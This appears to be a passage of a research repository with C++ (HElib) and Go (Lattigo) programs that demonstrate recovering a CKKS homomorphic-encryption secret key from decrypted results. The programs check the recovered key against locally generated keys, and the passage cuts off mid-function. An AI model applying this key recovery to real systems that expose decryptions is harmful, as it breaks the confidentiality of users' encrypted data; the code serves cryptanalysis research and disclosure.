| long m = pow(2,logm); // Zm* 94 | long r = logp; // bit precision 95 | long L = logQ; // Number of bits of Q 96 | 97 | // Setup the context 98 | helib::Context context(m, -1, r); // p = -1 => complex field, ie m = p-1 99 | 100 | // context.scale = 10; // used for sampling error bound 101 | helib::buildModChain(context, L, /*c=*/2); // 2 columns in key switching key 102 | helib::SecKey secretKey(context); 103 | secretKey.GenSecKey(); 104 | 105 | if (hc == HC_VARIANCE) { 106 | helib::addSome1DMatrices(secretKey); // add rotation keys for variance computation 107 | } 108 | helib::PubKey publicKey(secretKey); 109 | helib::EncryptedArrayCx const& ea(context.ea->getCx()); 110 | long n = ea.size(); // # slots 111 | 112 | ea.getPAlgebra().printout(); 113 | std::cout << "r = " << context.alMod.getR() << std::endl; 114 | std::cout << "ctxtPrimes=" << context.ctxtPrimes 115 | << ", ciphertext modulus bits=" << context.bitSizeOfQ() << std::endl 116 | << std::endl; 117 | 118 | #ifdef HELIB_DEBUG 119 | helib::setupDebugGlobals(&secretKey, context.ea); 120 | #endif 121 | 122 | // Initialize the plaintext vector 123 | std::vector> v1, v2; // v1 holds the plaintext input, v2 holds the decryption result 124 | ea.random(v1,B); // generate a random array of size m/2 125 | std::cout << "v : size = " << v1.size() << ", infty norm = " << largestCxNorm(v1) << std::endl; 126 | 127 | // Encryption 128 | helib::Ctxt c_v(publicKey); // Ctxt::parts contains the ciphertext polynomials 129 | ea.encrypt(c_v, publicKey, v1); 130 | 131 | // Homomorphic computation 132 | std::vector coeff(11); 133 | helib::Ctxt c_res(publicKey); 134 | switch (hc) { 135 | case HC_VARIANCE : 136 | c_res = evalVariance(ea, c_v, v1.size()); 137 | break; 138 | case HC_SIGMOID : 139 | coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::SIGMOID]; 140 | c_res = evalFunction(c_v, n, coeff, evalDeg); // compute the logistic function 141 | break; 142 | case HC_EXP : 143 | coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::EXP]; 144 | c_res = evalFunction(c_v, n, coeff, evalDeg); // compute the exponential function 145 | break; 146 | default : 147 | c_res = c_v; // just copy the input ciphertext 148 | } 149 | showCtxtScale(c_res, "result "); 150 | long logExtraScaling = std::ceil(log2(ea.encodeRoundingError() / 3.5)); 151 | helib::IndexSet s1 = c_res.getPrimeSet(); 152 | while(NTL::log(c_res.getRatFactor())/log(2.0) > r + logExtraScaling + 10 && s1.card() > 1) { 153 | s1.remove(s1.last()); 154 | c_res.modDownToSet(s1); 155 | showCtxtScale(c_res, "modDown"); 156 | s1 = c_res.getPrimeSet(); 157 | } 158 | 159 | // Decryption 160 | ea.decrypt(c_res, secretKey, v2); 161 | 162 | // Check homomorphic computation error 163 | std::vector> ptRes(v2.size()); 164 | switch (hc) { 165 | case HC_VARIANCE : 166 | evalPlainVariance(ptRes, v1); 167 | break; 168 | case HC_SIGMOID : 169 | evalPlainFunc(ptRes, v1, SpecialFunction::SIGMOID, evalDeg); 170 | break; 171 | case HC_EXP : 172 | evalPlainFunc(ptRes, v1, SpecialFunction::EXP, evalDeg); 173 | break; 174 | default : 175 | ptRes = v1; 176 | } 177 | std::cout << "computation error = " << maxDiff(ptRes, v2) // abs(ptRes[0] - v2[v2.size()-1]) 178 | << ", relative error = " << relError(v2, ptRes) << std::endl; // maxDiff(ptRes, v2)/largestElm(ptRes) 179 | 180 | // Key recovery attack ************************************************** // 181 | 182 | // Now let's try to recover sk 183 | NTL::xdouble scalingFactor = c_res.getRatFactor(); 184 | 185 | // Here we use a modified encoding function to round directly into ZZX, 186 | // instead of rounding to a helib::zzX, which is a vector of long so it could 187 | // cause integer overflow 188 | NTL::ZZX mPrimeX; 189 | helib::CKKS_embedInSlots(mPrimeX, v2, context.zMStar, NTL::to_double(scalingFactor)); 190 | 191 | // Check if encoding recovers the decrypted ptxt (before modulo reduction) 192 | NTL::ZZX encodingDiffX = mPrimeX - helib::decrypted_ptxt_; 193 | NTL::xdouble mPrimeNorm = helib::coeffsL2Norm(mPrimeX); 194 | std::cout << "encoding error = " << helib::largestCoeff(encodingDiffX) << std::endl; 195 | std::cout << "m' norm = " << mPrimeNorm << ", bits = " << NTL::log(mPrimeNorm)/std::log(2) << std::endl; 196 | 197 | helib::DoubleCRT ctxtb = c_res.getPart(0); // Ctxt::getPart() is added to helib to access 198 | helib::DoubleCRT ctxta = c_res.getPart(1); // the individual parts 199 | 200 | NTL::ZZX ctxtbX, ctxtaX; 201 | ctxtb.toPoly(ctxtbX,true); 202 | ctxta.toPoly(ctxtaX,true); 203 | 204 | NTL::ZZ Q; 205 | context.productOfPrimes(Q, c_res.getPrimeSet()); 206 | std::cout << "sk.Q = " << Q << std::endl; 207 | 208 | NTL::ZZ_p::init(Q); 209 | 210 | NTL::ZZ_pX ctxtb_pX, ctxta_pX, mPrime_pX, phim_pX; 211 | NTL::conv(ctxtb_pX, ctxtbX); 212 | NTL::conv(ctxta_pX, ctxtaX); 213 | NTL::conv(mPrime_pX, mPrimeX); 214 | NTL::conv(phim_pX, context.zMStar.getPhimX()); 215 | 216 | NTL::ZZ_pX ss_pX, ctxtaInv_pX; 217 | NTL::ZZ_pX c_pX = mPrime_pX - ctxtb_pX; // c = m' - cb = ca * s 218 | NTL::InvMod(ctxtaInv_pX, ctxta_pX, phim_pX); // ca^{-1} mod (X^{m/2} + 1) 219 | NTL::MulMod(ss_pX, c_pX, ctxtaInv_pX, phim_pX); // c * ca^{-1} = s 220 | 221 | helib::DoubleCRT sk = secretKey.sKeys[0]; 222 | NTL::ZZX skX; 223 | sk.toPoly(skX,true); 224 | NTL::ZZ_pX sk_pX; 225 | NTL::conv(sk_pX, skX); 226 | 227 | bool foundKey = (ss_pX == sk_pX); 228 | std::cout << (foundKey ? "Found key!" : "Attack failed") << std::endl; 229 | } 230 | 231 | 232 | int main(int argc, char * argv[]) { 233 | HomomorphicComputation hc = argc>1 ? parseHC(argv[1]) : HC_NOOP; // Default noop 234 | long logQ = 300; 235 | long logm = argc>2 ? atoi(argv[2])+1 : 17; // m = 2N 236 | long logp = argc>3 ? atoi(argv[3]) : 20; // 20 bit precision 237 | double plainBound = argc>4 ? atof(argv[4]) : 1.0; // plaintext size 238 | long evalDeg = argc>5 ? atoi(argv[5]) : -1; // default to all degrees 239 | 240 | std::cout << "Running helib attack for " << hcString(hc) 241 | << ", N = 2^" << logm-1 242 | << ", logp = " << logp 243 | << ", |plaintext| = " << plainBound 244 | << ", evalDeg = " << evalDeg << std::endl; 245 | 246 | NTL::SetNumThreads(8); 247 | test(/*logm=*/logm, 248 | /*logp=*/logp, 249 | /*logQ=*/logQ, 250 | /*B=*/plainBound, 251 | /*evalDeg=*/evalDeg, 252 | /*hc=*/hc); 253 | return 0; 254 | } 255 | -------------------------------------------------------------------------------- /src/helib_utils.cpp: -------------------------------------------------------------------------------- 1 | #include "helib_utils.h" 2 | 3 | #include 4 | 5 | double largestCxNorm(std::vector> const& vec) { 6 | double m = 0; 7 | for (auto& x : vec) { 8 | if (m < std::abs(x)) 9 | m = std::abs(x); 10 | } 11 | return m; 12 | } 13 | 14 | 15 | void showDCRT(helib::DoubleCRT * dcrt, long size) { 16 | helib::Context const& context = dcrt->getContext(); 17 | helib::IndexMap const& map = dcrt->getMap(); 18 | helib::IndexSet const& s = map.getIndexSet(); 19 | NTL::ZZ Q; 20 | context.productOfPrimes(Q, s); 21 | std::cout << "[[" << Q << "]]" << std::endl; 22 | 23 | for (long i : s) { 24 | NTL::vec_long const& row = map[i]; 25 | NTL::zz_pX tmp; 26 | context.ithModulus(i).iFFT(tmp, row); // inverse FFT 27 | long phim = row.length(); 28 | long pi = context.ithPrime(i); // the i'th modulus 29 | std::cout << "[" << pi << "] "; 30 | for (size_t j = 0; j < phim && j < size; j++) { 31 | std::cout << tmp.rep[j] << ", "; 32 | } 33 | std::cout << std::endl; 34 | } 35 | } 36 | 37 | void showVec(helib::zzX * vals, long size) { 38 | std::cout << "["; 39 | std::cout << (*vals)[0]; 40 | for (long i = 1; i < size; ++i) { 41 | std::cout << ", " << (*vals)[i]; 42 | } 43 | std::cout << "]" << std::endl; 44 | } 45 | 46 | void showCtxtScale(helib::Ctxt const& c, char const* str) { 47 | std::cout << str << " rf = 2^" << NTL::log(NTL::fabs(c.getRatFactor()))/log(2.0) 48 | << ", pm = " << c.getPtxtMag() 49 | << ", log |q_l| = " << c.logOfPrimeSet()/log(2.0) << std::endl; 50 | } 51 | 52 | void add(std::vector & out, std::vector const& in0, std::vector const& in1) { 53 | for (size_t i = 0; i < in0.size(); i++) { 54 | out[i].real(in0[i].real() + in1[i].real()); 55 | out[i].imag(in0[i].imag() + in1[i].imag()); 56 | } 57 | } 58 | 59 | void mul(std::vector & out, std::vector const& in0, std::vector const& in1) { 60 | for (size_t i = 0; i < in0.size(); i++) { 61 | out[i].real(in0[i].real() * in1[i].real()); 62 | out[i].imag(in0[i].imag() * in1[i].imag()); 63 | } 64 | } 65 | 66 | std::vector diff(std::vector const& in0, std::vector const& in1) { 67 | std::vector out(in0.size()); 68 | for (size_t i = 0; i < std::min(in0.size(), in1.size()); i++) { 69 | out[i].real(in0[i].real() - in1[i].real()); 70 | out[i].imag(in0[i].imag() - in1[i].imag()); 71 | } 72 | return out; 73 | } 74 | 75 | NTL::ZZX decrypted; 76 | 77 | void copyTo(NTL::ZZX * tgt, NTL::ZZX const* src) { 78 | *tgt = *src; 79 | } 80 | 81 | 82 | -------------------------------------------------------------------------------- /src/helib_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef HELIB_UTILS_H 2 | #define HELIB_UTILS_H 3 | /* Some helper functions for using helib */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include "ntl_utils.h" 10 | 11 | double largestCxNorm(std::vector> const& vec); 12 | 13 | void showDCRT(helib::DoubleCRT * dcrt, long size); 14 | 15 | void showVec(helib::zzX * vals, long size); 16 | 17 | void showCtxtScale(helib::Ctxt const& c, char const* str); 18 | 19 | typedef std::complex cx_double; 20 | 21 | void mul(std::vector & out, std::vector const& in0, std::vector const& in1); 22 | 23 | void add(std::vector & out, std::vector const& in0, std::vector const& in1); 24 | 25 | std::vector diff(std::vector const& in0, std::vector const& in1); 26 | 27 | extern NTL::ZZX decrypted; 28 | void copyTo(NTL::ZZX * tgt, NTL::ZZX const* src); 29 | 30 | #include 31 | #include 32 | 33 | template 34 | std::ostream &operator <<(std::ostream &os, const std::vector &v) { 35 | using namespace std; 36 | os << "["; 37 | copy(v.begin(), v.end(), ostream_iterator(os, " ")); 38 | os << "]"; 39 | return os; 40 | } 41 | 42 | 43 | #endif // HELIB_UTILS_H 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /src/lattigo/go.mod: -------------------------------------------------------------------------------- 1 | module ckks_attack 2 | 3 | go 1.13 4 | 5 | replace github.com/ldsec/lattigo/v2 => /scratch/lattigo // change "/scratch/lattigo" to your lattigo path 6 | 7 | require github.com/ldsec/lattigo/v2 v2.0.0-00010101000000-000000000000 8 | -------------------------------------------------------------------------------- /src/lattigo/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "math" 6 | "math/cmplx" 7 | "math/rand" 8 | "math/big" 9 | "time" 10 | "unsafe" 11 | "github.com/ldsec/lattigo/v2/ring" 12 | "github.com/ldsec/lattigo/v2/ckks" 13 | ) 14 | 15 | func randomFloat(min, max float64) float64 { 16 | return min + rand.Float64()*(max-min) 17 | } 18 | 19 | func randomComplex(min, max float64) complex128 { 20 | return complex(randomFloat(min, max), randomFloat(min, max)) 21 | } 22 | 23 | //////////////////////////////////////////////////////////////////////////////// 24 | // The linear key recovery attack, applied to homomorphically computed sigmoid 25 | // of random complex numbers in [-8, 8], in the full packing mode 26 | //////////////////////////////////////////////////////////////////////////////// 27 | func attack_sigmoid() { 28 | 29 | // This demo is modified on top of the example code lattigo/sigmoid. 30 | // The following computation packs random 8192 float64 values in the range [-8, 8] 31 | // and approximates the function 1/(exp(-x) + 1) over the range [-8, 8]. 32 | // Once the homomorphic computation is done, we decrypt and decode the results, 33 | // and then re-encode the resulting noisy complex numbers into a polynomial m', 34 | // and then try to compute the linear equation s' = c[a]^{-1} * (m' - c[b]) 35 | 36 | rand.Seed(time.Now().UnixNano()) 37 | 38 | // Scheme params 39 | params := ckks.DefaultParams[ckks.PN15QP827pq] 40 | 41 | encoder := ckks.NewEncoder(params) 42 | 43 | // Keys 44 | kgen := ckks.NewKeyGenerator(params) 45 | var sk *ckks.SecretKey 46 | var pk *ckks.PublicKey 47 | sk, pk = kgen.GenKeyPair() 48 | 49 | // Relinearization key 50 | var rlk *ckks.EvaluationKey 51 | rlk = kgen.GenRelinKey(sk) 52 | 53 | // Encryptor 54 | encryptor := ckks.NewEncryptorFromPk(params, pk) 55 | 56 | // Decryptor 57 | decryptor := ckks.NewDecryptor(params, sk) 58 | 59 | // Evaluator 60 | evaluator := ckks.NewEvaluator(params) 61 | 62 | // Values to encrypt 63 | values := make([]complex128, params.Slots()) 64 | for i := range values { 65 | values[i] = complex(randomFloat(-8, 8), 0) 66 | } 67 | 68 | fmt.Printf("CKKS parameters: logN = %d, logQ = %d, levels = %d, scale= %f, sigma = %f \n", 69 | params.LogN(), params.LogQP(), params.MaxLevel()+1, params.Scale(), params.Sigma()) 70 | fmt.Println() 71 | fmt.Printf("Values : %6f %6f %6f %6f...\n", 72 | round(values[0]), round(values[1]), round(values[2]), round(values[3])) 73 | fmt.Println() 74 | 75 | // Plaintext creation and encoding process 76 | plaintext := ckks.NewPlaintext(params, params.MaxLevel(), params.Scale()) 77 | encoder.Encode(plaintext, values, params.Slots()) 78 | 79 | // Encryption process 80 | var ciphertext *ckks.Ciphertext 81 | ciphertext = encryptor.EncryptNew(plaintext) 82 | 83 | fmt.Println("Evaluation of the function 1/(exp(-x)+1) in the range [-8, 8] (degree of approximation: 32)") 84 | 85 | // Evaluation process 86 | // We approximate f(x) in the range [-8, 8] with a Chebyshev interpolant of 33 coefficients (degree 32). 87 | chebyapproximation := ckks.Approximate(f, -8, 8, 33) 88 | 89 | // We evaluate the interpolated Chebyshev interpolant on the ciphertext 90 | ciphertext = evaluator.EvaluateCheby(ciphertext, chebyapproximation, rlk) 91 | 92 | fmt.Println("Done... Consumed levels:", params.MaxLevel()-ciphertext.Level()) 93 | 94 | // Computation of the reference values 95 | for i := range values { 96 | values[i] = f(values[i]) 97 | } 98 | 99 | // Print results and comparison 100 | printDebug(params, ciphertext, values, decryptor, encoder) 101 | 102 | // Decrypt ciphertext 103 | level := ciphertext.Level() 104 | plaintextNoisy := decryptor.DecryptNew(ciphertext) 105 | valuesNoisy := make([]complex128, params.Slots()) 106 | valuesNoisy = encoder.Decode(plaintextNoisy, params.Slots()) 107 | if plaintextNoisy.Level() != level { panic("level doesn't match") } 108 | if !plaintextNoisy.IsNTT() { panic("decrypted plaintext should be in NTT form") } 109 | fmt.Printf("level = %d, scale = %f, slots = %d\n", level, math.Log2(plaintextNoisy.Scale()), params.Slots()) 110 | fmt.Println("Now try to recovery the secret key...\n") 111 | 112 | // Re-encode 113 | plaintextTest := ckks.NewPlaintext(params, level, plaintextNoisy.Scale()) 114 | encoder.Encode(plaintextTest, valuesNoisy, params.Slots()) // plaintextTest is not in NTT 115 | if plaintextTest.IsNTT() { 116 | panic("encoded plaintext should not be in NTT form") 117 | } 118 | 119 | // Create a ring data structure 120 | var ringQ *ring.Ring 121 | ringQ, _ = ring.NewRing(params.N(), params.Qi()) 122 | 123 | // mEncode is the re-encoded polynomial, in NTT form 124 | mEncode := ringQ.NewPolyLvl(level) 125 | ringQ.NTTLvl(level, plaintextTest.Value()[0], mEncode) // mEncode in NTT 126 | 127 | mNoisy := ringQ.NewPolyLvl(level) // plaintextNoisy in non NTT form 128 | mError := ringQ.NewPolyLvl(level) // encoding error 129 | ringQ.InvNTTLvl(level, plaintextNoisy.Value()[0], mNoisy) // mNoisy is not in NTT 130 | ringQ.SubLvl(level, plaintextTest.Value()[0], mNoisy, mError) 131 | nm := inftyNorm(ringQ, mError, params.N()) 132 | fmt.Printf("encoding error = %s\n", nm.String()); 133 | 134 | // Compute the linear equation m' - c[b] = c[a] * s 135 | if !ciphertext.IsNTT() { panic("ciphertext should be in NTT form") } 136 | rhs := ringQ.NewPolyLvl(level) 137 | ringQ.SubLvl(level, mEncode, ciphertext.Value()[0], rhs) // rhs is in NTT 138 | 139 | aInv := ringQ.NewPolyLvl(level) 140 | InvPolyNTT(ringQ, level, ciphertext.Value()[1], aInv) // aInv is in NTT 141 | 142 | sGuess := ringQ.NewPolyLvl(level) 143 | ringQ.MulCoeffsMontgomeryLvl(level, rhs, aInv, sGuess) // sGuess is in NTT 144 | // ringQ.InvNTTLvl(level, sGuess, sGuess) 145 | 146 | s := sk.Get().CopyNew() 147 | ringQ.InvMForm(s, s) 148 | // ringQ.InvNTT(s, s) 149 | if ringQ.EqualLvl(level, sGuess, s) { 150 | fmt.Printf("Found key!\n") 151 | } else { 152 | fmt.Printf("Failed\n") 153 | } 154 | } 155 | 156 | ////////////////////////////////////////////////// 157 | // Inversion in the cyclotomic ring 158 | ////////////////////////////////////////////////// 159 | 160 | // modular exponential, taken from lattigo/utils/utils.go 161 | func modExp(x, e, p uint64, bredParams []uint64) (result uint64) { 162 | result = 1 163 | for i := e; i > 0; i >>= 1 { 164 | if i&1 == 1 { 165 | result = ring.BRed(result, x, p, bredParams) 166 | } 167 | x = ring.BRed(x, x, p, bredParams) 168 | } 169 | return result 170 | } 171 | 172 | // compute p1^{-1} in the ring r, and return the result in p2 173 | func InvPolyNTT(r *ring.Ring, level uint64, p1, p2 *ring.Poly) { 174 | for i := uint64(0); i < level+1; i++ { 175 | qi := r.Modulus[i] 176 | p1tmp, p2tmp := p1.Coeffs[i], p2.Coeffs[i] 177 | bredParams := r.BredParams[i] 178 | for j := uint64(0); j < r.N; j = j + 8 { 179 | x := (*[8]uint64)(unsafe.Pointer(&p1tmp[j])) 180 | y := (*[8]uint64)(unsafe.Pointer(&p2tmp[j])) 181 | 182 | y[0] = ring.MForm(modExp(x[0], qi-2, qi, bredParams), qi, bredParams) 183 | y[1] = ring.MForm(modExp(x[1], qi-2, qi, bredParams), qi, bredParams) 184 | y[2] = ring.MForm(modExp(x[2], qi-2, qi, bredParams), qi, bredParams) 185 | y[3] = ring.MForm(modExp(x[3], qi-2, qi, bredParams), qi, bredParams) 186 | y[4] = ring.MForm(modExp(x[4], qi-2, qi, bredParams), qi, bredParams) 187 | y[5] = ring.MForm(modExp(x[5], qi-2, qi, bredParams), qi, bredParams) 188 | y[6] = ring.MForm(modExp(x[6], qi-2, qi, bredParams), qi, bredParams) 189 | y[7] = ring.MForm(modExp(x[7], qi-2, qi, bredParams), qi, bredParams) 190 | } 191 | } 192 | } 193 | 194 | 195 | func inftyNorm(r *ring.Ring, p *ring.Poly, N uint64) *big.Int { 196 | max := new(big.Int) 197 | 198 | level := uint64(len(p.Coeffs)-1) 199 | 200 | bigintCoeffs := make([]*big.Int, N) 201 | r.PolyToBigint(p, bigintCoeffs) 202 | 203 | QBigInt := ring.NewUint(1) 204 | for i := range r.Modulus[:level+1]{ 205 | QBigInt.Mul(QBigInt, ring.NewUint(r.Modulus[i])) 206 | } 207 | 208 | QHalfBigInt := new(big.Int) 209 | QHalfBigInt.Set(QBigInt) 210 | QHalfBigInt.Rsh(QBigInt, 1) 211 | 212 | // Centers and absolute values 213 | var sign int 214 | for i := range bigintCoeffs{ 215 | sign = bigintCoeffs[i].Cmp(QHalfBigInt) 216 | if sign == 1 || sign == 0 { 217 | bigintCoeffs[i].Sub(bigintCoeffs[i], QBigInt) 218 | bigintCoeffs[i].Abs(bigintCoeffs[i]) 219 | } 220 | } 221 | 222 | for i := uint64(0); i < r.N; i++ { 223 | if bigintCoeffs[i].Cmp(max) > 0 { 224 | max = bigintCoeffs[i] 225 | } 226 | } 227 | return max 228 | } 229 | 230 | func printPoly(r *ring.Ring, p *ring.Poly, level uint64) { 231 | for i := uint64(0); i < level+1; i++ { 232 | qi := r.Modulus[i] 233 | fmt.Printf("[%d] = %d %d %d %d...\n", qi, p.Coeffs[i][0], p.Coeffs[i][1], p.Coeffs[i][2], p.Coeffs[i][3]) 234 | } 235 | } 236 | 237 | func printComplex(values []complex128) { 238 | fmt.Printf("%6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f...\n", 239 | values[0], values[1], values[2], values[3], values[4], values[5], values[6], values[7]) 240 | } 241 | 242 | func f(x complex128) complex128 { 243 | return 1 / (cmplx.Exp(-x) + 1) 244 | } 245 | 246 | func round(x complex128) complex128 { 247 | var factor float64 248 | factor = 100000000 249 | a := math.Round(real(x)*factor) / factor 250 | b := math.Round(imag(x)*factor) / factor 251 | return complex(a, b) 252 | } 253 | 254 | func printDebug(params *ckks.Parameters, ciphertext *ckks.Ciphertext, valuesWant []complex128, decryptor ckks.Decryptor, encoder ckks.Encoder) (valuesTest []complex128) { 255 | slots := uint64(len(valuesWant)) 256 | 257 | valuesTest = encoder.Decode(decryptor.DecryptNew(ciphertext), slots) 258 | 259 | fmt.Println() 260 | fmt.Printf("Level: %d (logQ = %d)\n", ciphertext.Level(), params.LogQLvl(ciphertext.Level())) 261 | fmt.Printf("Scale: 2^%f\n", math.Log2(ciphertext.Scale())) 262 | fmt.Printf("ValuesTest: %6.10f %6.10f %6.10f %6.10f...\n", valuesTest[0], valuesTest[1], valuesTest[2], valuesTest[3]) 263 | fmt.Printf("ValuesWant: %6.10f %6.10f %6.10f %6.10f...\n", valuesWant[0], valuesWant[1], valuesWant[2], valuesWant[3]) 264 | fmt.Println() 265 | 266 | precStats := ckks.GetPrecisionStats(params, nil, nil, valuesWant, valuesTest) 267 | fmt.Println(precStats.String()) 268 | 269 | return 270 | } 271 | 272 | func main() { 273 | attack_sigmoid() 274 | } 275 | -------------------------------------------------------------------------------- /src/lattigo_new/go.mod: -------------------------------------------------------------------------------- 1 | module ckks_attack 2 | 3 | go 1.13 4 | 5 | replace github.com/ldsec/lattigo/v2 => /scratch/lattigo // change "/scratch/lattigo" to your lattigo path 6 | 7 | require github.com/ldsec/lattigo/v2 v2.0.0-00010101000000-000000000000 8 | -------------------------------------------------------------------------------- /src/lattigo_new/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "math" 6 | "math/cmplx" 7 | "math/rand" 8 | "math/big" 9 | "time" 10 | "unsafe" 11 | "github.com/ldsec/lattigo/v2/ring" 12 | "github.com/ldsec/lattigo/v2/ckks" 13 | ) 14 | 15 | func randomFloat(min, max float64) float64 { 16 | return min + rand.Float64()*(max-min) 17 | } 18 | 19 | func randomComplex(min, max float64) complex128 { 20 | return complex(randomFloat(min, max), randomFloat(min, max)) 21 | } 22 | 23 | //////////////////////////////////////////////////////////////////////////////// 24 | // The linear key recovery attack, applied to homomorphically computed sigmoid 25 | // of random complex numbers in [-8, 8], in the full packing mode 26 | //////////////////////////////////////////////////////////////////////////////// 27 | func attack_sigmoid() { 28 | 29 | var err error 30 | 31 | // This demo is modified on top of the example code lattigo/sigmoid. 32 | // The following computation packs random 8192 float64 values in the range [-8, 8] 33 | // and approximates the function 1/(exp(-x) + 1) over the range [-8, 8]. 34 | // Once the homomorphic computation is done, we decrypt and decode the results, 35 | // and then re-encode the resulting noisy complex numbers into a polynomial m', 36 | // and then try to compute the linear equation s' = c[a]^{-1} * (m' - c[b]) 37 | 38 | rand.Seed(time.Now().UnixNano()) 39 | 40 | // Scheme params 41 | params := ckks.DefaultParams[ckks.PN15QP827pq] 42 | 43 | encoder := ckks.NewEncoder(params) 44 | 45 | // Keys 46 | kgen := ckks.NewKeyGenerator(params) 47 | var sk *ckks.SecretKey 48 | var pk *ckks.PublicKey 49 | sk, pk = kgen.GenKeyPair() 50 | 51 | // Relinearization key 52 | var rlk *ckks.EvaluationKey 53 | rlk = kgen.GenRelinKey(sk) 54 | 55 | // Encryptor 56 | encryptor := ckks.NewEncryptorFromPk(params, pk) 57 | 58 | // Decryptor 59 | decryptor := ckks.NewDecryptor(params, sk) 60 | 61 | // Evaluator 62 | evaluator := ckks.NewEvaluator(params) 63 | 64 | // Values to encrypt 65 | values := make([]complex128, params.Slots()) 66 | for i := range values { 67 | values[i] = complex(randomFloat(-8, 8), 0) 68 | } 69 | 70 | fmt.Printf("CKKS parameters: logN = %d, logQ = %d, levels = %d, scale= %f, sigma = %f \n", 71 | params.LogN(), params.LogQP(), params.MaxLevel()+1, params.Scale(), params.Sigma()) 72 | fmt.Println() 73 | fmt.Printf("Values : %6f %6f %6f %6f...\n", 74 | round(values[0]), round(values[1]), round(values[2]), round(values[3])) 75 | fmt.Println() 76 | 77 | // Plaintext creation and encoding process 78 | plaintext := encoder.EncodeNew(values, params.LogSlots()) 79 | 80 | 81 | // Encryption process 82 | var ciphertext *ckks.Ciphertext 83 | ciphertext = encryptor.EncryptNew(plaintext) 84 | 85 | fmt.Println("Evaluation of the function 1/(exp(-x)+1) in the range [-8, 8] (degree of approximation: 32)") 86 | 87 | // Evaluation process 88 | // We approximate f(x) in the range [-8, 8] with a Chebyshev interpolant of 33 coefficients (degree 32). 89 | chebyapproximation := ckks.Approximate(f, -8, 8, 33) 90 | a := chebyapproximation.A() 91 | b := chebyapproximation.B() 92 | 93 | // Change of variable 94 | evaluator.MultByConst(ciphertext, 2/(b-a), ciphertext) 95 | evaluator.AddConst(ciphertext, (-a-b)/(b-a), ciphertext) 96 | evaluator.Rescale(ciphertext, params.Scale(), ciphertext) 97 | // We evaluate the interpolated Chebyshev interpolant on the ciphertext 98 | if ciphertext, err = evaluator.EvaluateCheby(ciphertext, chebyapproximation, rlk); err != nil { 99 | panic(err) 100 | } 101 | fmt.Println("Done... Consumed levels:", params.MaxLevel()-ciphertext.Level()) 102 | 103 | // Computation of the reference values 104 | for i := range values { 105 | values[i] = f(values[i]) 106 | } 107 | 108 | // Print results and comparison 109 | printDebug(params, ciphertext, values, decryptor, encoder) 110 | 111 | // Decrypt ciphertext 112 | level := ciphertext.Level() 113 | plaintextNoisy := decryptor.DecryptNew(ciphertext) 114 | 115 | valuesExact := make([]complex128, params.Slots()) 116 | valuesExact = encoder.DecodeAndRound(plaintextNoisy, params.LogSlots(), plaintextNoisy.Scale()) // 1<<35 117 | 118 | valuesNoisy := make([]complex128, params.Slots()) 119 | valuesNoisy = encoder.DecodeAndRound(plaintextNoisy, params.LogSlots(), 1<<35) 120 | if plaintextNoisy.Level() != level { panic("level doesn't match") } 121 | if !plaintextNoisy.IsNTT() { panic("decrypted plaintext should be in NTT form") } 122 | fmt.Printf("level = %d, scale = %f, slots = %d\n", level, math.Log2(plaintextNoisy.Scale()), params.Slots()) 123 | fmt.Printf("added noise = %f\n", maxDiff(valuesExact, valuesNoisy)) 124 | 125 | fmt.Println("Now try to recovery the secret key...\n") 126 | 127 | sc := 1<<5 128 | ciphertextScaled := evaluator.MultByConstNew(ciphertext, sc) 129 | fmt.Printf("Scale up...level = %d, scale = %f\n", ciphertextScaled.Level(), math.Log2(ciphertextScaled.Scale())) 130 | 131 | plaintextScaled := decryptor.DecryptNew(ciphertextScaled) 132 | valuesScaled := make([]complex128, params.Slots()) 133 | valuesScaled = encoder.DecodeAndRound(plaintextScaled, params.LogSlots(), plaintextScaled.Scale()/(1<<5)) 134 | fmt.Printf("valuesScaled = %f + %f I\n", real(valuesScaled[0]), imag(valuesScaled[1])) 135 | fmt.Printf("plaintextScaled level = %d, scale = %f\n", plaintextScaled.Level(), math.Log2(plaintextScaled.Scale())) 136 | 137 | { 138 | scInv := 1.0/float64(sc) 139 | for i := range valuesNoisy { 140 | // B := float64(1<<35) 141 | re := real(valuesScaled[i])*scInv 142 | im := imag(valuesScaled[i])*scInv 143 | valuesNoisy[i] = complex(re, im) 144 | } 145 | // evaluator.MultByConst(ciphertext, scInv, ciphertext) 146 | fmt.Println("Scale down... at levels:", ciphertext.Level(), ", scale = ", math.Log2(ciphertext.Scale())) 147 | // evaluator.Rescale(ciphertext, params.Scale(), ciphertext) 148 | // fmt.Println("Rescale... at levels:", ciphertext.Level(), ", scale = ", math.Log2(ciphertext.Scale())) 149 | // level = ciphertext.Level() 150 | // plaintextNoisy = decryptor.DecryptNew(ciphertext) 151 | } 152 | 153 | // Re-encode 154 | plaintextTest := ckks.NewPlaintext(params, level, ciphertext.Scale()) 155 | encoder.Encode(plaintextTest, valuesNoisy, params.LogSlots()) // plaintextTest is not in NTT 156 | if plaintextTest.IsNTT() { 157 | panic("encoded plaintext should not be in NTT form") 158 | } 159 | 160 | // Create a ring data structure 161 | var ringQ *ring.Ring 162 | ringQ, _ = ring.NewRing(params.N(), params.Qi()) 163 | 164 | // mEncode is the re-encoded polynomial, in NTT form 165 | mEncode := ringQ.NewPolyLvl(level) 166 | ringQ.NTTLvl(level, plaintextTest.Value()[0], mEncode) // mEncode in NTT 167 | 168 | 169 | 170 | mNoisy := ringQ.NewPolyLvl(level) // plaintextNoisy in non NTT form 171 | mError := ringQ.NewPolyLvl(level) // encoding error 172 | ringQ.InvNTTLvl(level, plaintextNoisy.Value()[0], mNoisy) // mNoisy is not in NTT 173 | ringQ.SubLvl(level, plaintextTest.Value()[0], mNoisy, mError) 174 | nm := inftyNorm(ringQ, mError, params.N()) 175 | fmt.Printf("encoding error = %s\n", nm.String()); 176 | printPoly(ringQ, mNoisy, level) 177 | printPoly(ringQ, plaintextTest.Value()[0], level) 178 | // Compute the linear equation m' - c[b] = c[a] * s 179 | if !ciphertext.IsNTT() { panic("ciphertext should be in NTT form") } 180 | rhs := ringQ.NewPolyLvl(level) 181 | ringQ.SubLvl(level, mEncode, ciphertext.Value()[0], rhs) // rhs is in NTT 182 | 183 | 